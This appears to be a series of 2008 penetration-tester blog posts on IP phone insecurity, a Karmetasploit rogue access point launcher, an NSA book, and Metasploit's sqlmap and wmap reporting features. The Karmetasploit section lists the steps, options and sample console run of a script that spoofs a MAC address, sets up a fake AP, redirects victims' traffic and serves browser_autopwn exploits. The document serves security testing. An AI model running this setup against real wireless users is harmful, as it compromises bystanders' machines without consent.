Secure Your IP Phones


I have been traveling and immersed in several projects for the last couple of weeks and on all clients I saw IP Phones and I can say that on all clients they where not secured. In fact as you can see in the attached picture I had all the info by just pressing some buttons. I have always give the advice to my clients but it tends to fall in to deaf ears. In fact when asking almost all the guys I know who administer VOIP infrastructures do not even encrypt RSTP stream!! and many have phones in lobby and conference rooms and exposed jacks that only use CDP as a means to acces the VOIP VLAN, voiphopper anyone?

Karmetasploit Script Updated

/kmsapng.tgz

The script will do the following:
- Change the MAC address of the interface
- Set the Interface in Monitor Mode
- Start the Karma AP with Airbase-ng
- Change the MTU Size for the interface
- Set the IP
- Start the DHCPD server
- Set in iptables a redirect of all traffic to it self so as to bypass cached DNS entries
- Start Metasploit.

The script will crate a log file in /root called karma.log, as well as a sqlite db and a capture file all in the same folder.

here is a preview of the script and its option, I posted this same entry in the remote-exploit forums and the Pauldotcom forums and have received very good feedback on it.

bt ~ # ./kmsapng.sh -h
Karmetasploit AP launcher by Carlos Perez for Backtrack3
Version 0.2
carlos_perez[at]darkoperator.com
usage: kmsap.sh

Options:
-m : Mode, either km for regular karmetasploit attack
or kmf for filtered attack where only targeted
clients can associate to the fake AP.
-i : Interface supported by aircrack-ng for injection
-f : Text file with mac addresses of client computers
permited to connect to the fake AP.
-s : SSID name used as the initial broadcast
-h : This help message

Note: mode and interface are required for both type of attacks

Example:

bt ~ # ./kmsapng.sh -i wlan0 -m km -s linksys
Changing MAC Address
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.)
starting fake ap
This will take 15 seconds ..............
DHCPD started successfully
Starting Packet capture to /root/kms.cap
Starting Metasploit

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ msf v3.2-testing
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux

resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 10.0.0.1

......................................

I have tested the script using Ralink 2570, Realtek 8187L and Atheros cards. Let me know if you guys like it and if you have any recommendations. The script is heavily commented in case you whant to take a look.

Book: The Shadow Factory The Ultra-Secret NSA from 9/11 to the Eavesdropping on America

I just finished reading this book and I do have to say that it has brought up my paranoia level several fold, the powers of the NSA agency and how with the current legislation this agency have the power to spy on anybody in the world and with the ease that companies are cooperating to help with the data collection it is really frightening. I highly recommend this book it was a very en lighting read, from know on I'm going to be more aware to encrypt even more of my traffic. I high ly recommend the use of OTR for instant messaging (part of Adium on the Mac and a Plugging for Pidgin) and GNUPG for email.If you have the money I highly recommend PGP I know some of the folk there and I can tell you that they are top cryptologist and are very dedicated to provide the best encryption for their costumers.

SQLMap Metasploit Module

With the latest version of sqlmap, they contributed to Metasploit a module for running their tools directly from the Framework, I really find this insteresting since it shows how the framework can leverage other tools to expand on its capabilities showing even more flexibility. To use the module one only has to type in the msfconsole "use use auxiliary/scanner/http/wmap_sqlmap" and from there type "show options" and select what options to set and set them.

Basic Reporting in Metasploit wmap

Well today I was pleasantly surprised when I did an SVN update and saw several changes to wmap, when reading the documentation I was even more surprised by seeing that basic reporting was added!!! know this is something that I have always found laking in MSF and seeing it in wmap really makes me happy, I do hope that the project keeps improving like it has been so far.
Information from the documentation:

Each module is capable of storing reporting information.
Reporting key concepts:

+ Reporting is used to gather and store data
+ Bye bye to useless risk levels
+ Data is not only findings (i.e vulnerabilities) but also any relevant
data (i.e. Database name from a SQL injection)
+ Data is available to other modules so reporting becomes a method to
share information
+ Data has context and that context is preserved.
+ Context is preserved by having a tree structure in the Report database
table
+ Every report entry has a parent_id the top parent_id is 0 and only used
to create a report entry (this allows for the storage of multiple reports)
+ The report table is basically a type,name,value database.
+ This schema allows the storage of data/vulnerabilities with any classification/naming
convention. (very useful to store vulnerabilities discovered in year 2060).

So how it works:

When q module is executed (using WMAP 'wmap_run -e' or standalone):

WMAP creates a new report entry, then in each module when something is found or
something needs to be reported the module should implement the following lines:

Example:

if (vulnerability is found)
print_status("FOUND BLAH BLAH BLAH")

#OBTAIN THE LATEST REPORT ID FOR HOST,PORT,SSL (target)
rep_id = wmap_base_report_id(
self.target_host,
self.target_port,
self.ssl
)

# REPORT ABOUT THE FINDING
vuln_id = wmap_report(rep_id,'VULNERABILITY','SQL_INJECTION',url_path,"A SQL injection
vulnerability was found in the following URL in the parameter 'test'")

# LETS SAY WE NEED TO STORE ALSO THE PARAMETER VULNERABLE TO THE INJECTION AND THE TYPE
# OF INJECTION.

NOTE: wmap_report() returns the id of this entry

wmap_report(vuln_id,'SQL_INJECTION','PARAMETER',parameter,"Notes balh blah")
wmap_report(vuln_id,'SQL_INJECTION','TYPE','String',"Notes 2 balh blah")
end


If you are connected to a database (db_connect) then reporting is active and every module executed will
store its results for reporting. Even if you define a RHOSTS range then the results auto-magically will
be organized per host,port as wmap_base_report_id() returns the last available report for the specified
host,port,ssl target.

Anything can be represented and reported and other modules will have access to this information to do
whatever they want.

To view available reports use the 'wmap_reports' command:

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > load db_wmap
[*] =[ WMAP v0.2 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_connect
[*] Successfully connected to the database
[*] File: /Users/et/.msf3/sqlite3.db
...
msf > wmap_reports -p
[*] Id. Created Target (host,port,ssl)
1. Wed Oct 22 23:22:16 -0500 2008 XX.XXX.XXX.XXX,80,0
[*] Done.
msf > wmap_reports -s 1
WMAP REPORT: XX.XXX.XXX.XXX,80,0 Metasploit WMAP Report [Wed Oct 22 23:22:16 -0500 2008]
WEB_SERVER TYPE: Apache [Wed Oct 22 23:22:16 -0500 2008]
VULNERABILITY SQL_INJECTION: /test.asp SQL injection found. [Wed Oct 22 23:22:31 -0500 2008]
SQL_INJECTION PARAMETER: id [Wed Oct 22 23:22:31 -0500 2008]
SQL_INJECTION TYPE: String [Wed Oct 22 23:22:31 -0500 2008]
[*] Done.